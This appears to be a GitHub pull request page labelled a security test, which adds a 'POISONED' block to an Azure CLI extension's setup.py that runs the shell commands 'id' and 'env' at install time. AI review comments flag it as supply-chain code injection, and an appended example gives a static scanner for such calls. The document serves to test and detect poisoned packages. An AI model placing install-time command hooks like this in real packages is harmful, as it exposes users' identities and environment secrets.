[Security Test] RCE vulnerability validation - DO NOT MERGE#9571

Open
wangzelin007 wants to merge 3 commits into Azure:main from wangzelin007:wzl/test_icm_20260202

@wangzelin007
Member


This checklist is used to make sure that common guidelines for a pull request are followed.

Related command

General Guidelines

  • Have you run azdev style <YOUR_EXT> locally? (pip install azdev required)
  • Have you run python scripts/ci/test_index.py -q locally? (pip install wheel==0.30.0 required)
  • My extension version conforms to the Extension version schema

For new extensions:

About Extension Publish

There is a pipeline to automatically build, upload and publish extension wheels.
Once your pull request is merged into main branch, a new pull request will be created to update src/index.json automatically.
You only need to update the version information in file setup.py and historical information in file HISTORY.rst in your PR but do not modify src/index.json.

Copilot AI review requested due to automatic review settings February 2, 2026 09:55
@azure-client-tools-bot-prd

azure-client-tools-bot-prd bot commented Feb 2, 2026

✔️ Azure CLI Extensions Breaking Change Test
✔️ Non Breaking Changes

@azure-client-tools-bot-prd

Hi @wangzelin007,
Please write the description of changes which can be perceived by customers into HISTORY.rst.
If you want to release a new extension version, please update the version in setup.py as well.

@yonzhan
Collaborator

yonzhan commented Feb 2, 2026

Thank you for your contribution! We will review the pull request and get back to you soon.

@github-actions

github-actions bot commented Feb 2, 2026

The git hooks are available for azure-cli and azure-cli-extensions repos. They could help you run required checks before creating the PR.

Please sync the latest code with latest dev branch (for azure-cli) or main branch (for azure-cli-extensions).
After that please run the following commands to enable git hooks:

pip install azdev --upgrade
azdev setup -c <your azure-cli repo path> -r <your azure-cli-extensions repo path>

@github-actions

github-actions bot commented Feb 2, 2026

CodeGen Tools Feedback Collection

Thank you for using our CodeGen tool. We value your feedback, and we would like to know how we can improve our product. Please take a few minutes to fill out our codegen survey.

@github-actions

github-actions bot commented Feb 2, 2026

Hi @wangzelin007

Release Suggestions

Module: acat

  • Please log updates into src/acat/HISTORY.rst
  • Update VERSION to 1.0.0b2 in src/acat/setup.py

Notes

Contributor

Copilot AI left a comment

Pull request overview

This pull request is a security test that intentionally introduces malicious code into the Azure CLI extension setup.py file to validate RCE (Remote Code Execution) vulnerability detection mechanisms. The PR title explicitly states "DO NOT MERGE".

Changes:

  • Injection of malicious code into the acat extension's setup.py that executes system commands during package installation

Comment on lines 10 to 14
try:
    print("[!] EXTENSION SETUP.PY POISONED [!]")
    os.system("id")
    os.system("env")
except:

Copilot AI Feb 2, 2026

The use of os.system() with hardcoded shell commands is a security anti-pattern. Even for testing purposes, os.system() should be avoided in favor of subprocess.run() with shell=False to prevent shell injection vulnerabilities. Additionally, the bare except clause silently catches and suppresses all exceptions, which could hide errors and make debugging difficult.

Suggested change
-try:
-    print("[!] EXTENSION SETUP.PY POISONED [!]")
-    os.system("id")
-    os.system("env")
-except:
+import subprocess
+try:
+    print("[!] EXTENSION SETUP.PY POISONED [!]")
+    subprocess.run(["id"], check=False)
+    subprocess.run(["env"], check=False)
+except Exception:

Copilot uses AI. Check for mistakes.
Comment on lines 8 to 15
import os
import sys
try:
    print("[!] EXTENSION SETUP.PY POISONED [!]")
    os.system("id")
    os.system("env")
except:
    pass

Copilot AI Feb 2, 2026

The PR title explicitly states "DO NOT MERGE", yet this PR is being submitted to the main branch. This creates a significant risk that the PR could be accidentally merged, which would inject malicious code into the production extension. If this is genuinely a security test, it should be conducted in a separate testing branch or environment, not against the main branch where accidental merges could occur.

Copilot uses AI. Check for mistakes.
Comment on lines 8 to 15
import os
import sys
try:
    print("[!] EXTENSION SETUP.PY POISONED [!]")
    os.system("id")
    os.system("env")
except:
    pass

Copilot AI Feb 2, 2026

This code introduces a Remote Code Execution (RCE) vulnerability by executing arbitrary system commands during package installation. The os.system() calls will execute the "id" and "env" shell commands when the setup.py file is run, which happens during pip install, python setup.py install, or when building wheels. This is a critical security issue that:

  1. Exposes system information (user identity and environment variables)
  2. Demonstrates the ability to execute arbitrary commands on the installation system
  3. Could be exploited to exfiltrate sensitive data or compromise the system
  4. Will execute automatically during normal package installation workflows

This type of malicious code injection is a common supply chain attack vector. While the PR title indicates this is a security test, such code should never be merged into the main branch as it would execute on any system that installs this extension.

Suggested change
-import os
-import sys
-try:
-    print("[!] EXTENSION SETUP.PY POISONED [!]")
-    os.system("id")
-    os.system("env")
-except:
-    pass
+import sys

Copilot uses AI. Check for mistakes.
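
As an added example (not part of the pull request, the Copilot review, or the Azure CLI tooling), a static check for the pattern the review above describes: it parses a setup.py with Python's `ast` module and reports calls that spawn processes or evaluate code, resolving import aliases first. The sample input is constructed from the snippet quoted in the review comments; `RISKY_CALLS`, `resolve` and `scan_setup_source` are names assumed here, and the call list is illustrative rather than exhaustive.

```python
import ast

# Constructed sample mirroring the snippet quoted in the review comments.
SAMPLE_SETUP_PY = '''import os
import sys
try:
    print("[!] EXTENSION SETUP.PY POISONED [!]")
    os.system("id")
    os.system("env")
except:
    pass
from setuptools import setup
setup(name="example", version="0.0.1")
'''

# Calls that start a process or evaluate code (assumed list, not exhaustive).
RISKY_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.check_output", "subprocess.Popen", "eval", "exec"}


def resolve(node, aliases):
    """Map a call target to its dotted name, undoing import aliases."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def scan_setup_source(source):
    """Return (line, call, literal_first_arg) for each risky call, by line."""
    tree, aliases, findings = ast.parse(source), {}, []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            prefix = f"{node.module}." if getattr(node, "module", None) else ""
            for a in node.names:
                aliases[a.asname or a.name] = prefix + a.name
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = resolve(node.func, aliases)
            if name in RISKY_CALLS:
                arg = node.args[0] if node.args else None
                literal = arg.value if isinstance(arg, ast.Constant) else None
                findings.append((node.lineno, name, literal))
    return sorted(findings, key=lambda f: f[0])
```

A static pass like this does not see calls assembled at run time (for example through `getattr` or `__import__`), so a clean result is not proof that a setup.py is safe to execute.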